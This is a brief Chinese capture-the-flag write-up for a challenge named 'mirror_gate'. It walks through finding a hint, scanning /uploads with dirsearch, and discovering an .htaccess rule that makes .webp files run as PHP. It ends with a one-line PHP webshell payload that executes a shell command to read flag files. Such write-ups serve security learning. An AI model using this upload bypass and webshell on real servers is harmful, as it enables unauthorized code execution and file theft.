mirror_gate
根据提示 请设法找出他系统中的应用配置缺陷,突破上传限制。,我们先抓一个响应包,发现存在 Server: Apache/2.4.51 (Debian) 头部, 猜测是 .htaccess(Apache 配置文件)解析问题。
收集信息
访问网站,F12 查看前端源码发现
plaintext
flag is in flag.php --- 说明 FLAG 在 flag.phpplaintext
HINT: c29tZXRoaW5nX2lzX2luXy91cGxvYWRzLw==
base64 解码:something_is_in_/uploads/上传 jpg 也有 hint:dirsearch
漏洞利用
用 dirsearch 扫描 ip:端口/uploads,发现 .htaccess 返回了 200,印证了我们的猜想。
下载 .htaccess 得到
plaintext
AddType application/x-httpd-php .webp这让上传的 .webp 文件被解析成 php 类型。
接下来上传 webp 一句话木马,利用解析漏洞让我们的 .webp 解析成 php, 从而绕过检查。再简单地绕过一下 waf 就可以,这里打法很多。
php
<?=`tac /f*`?>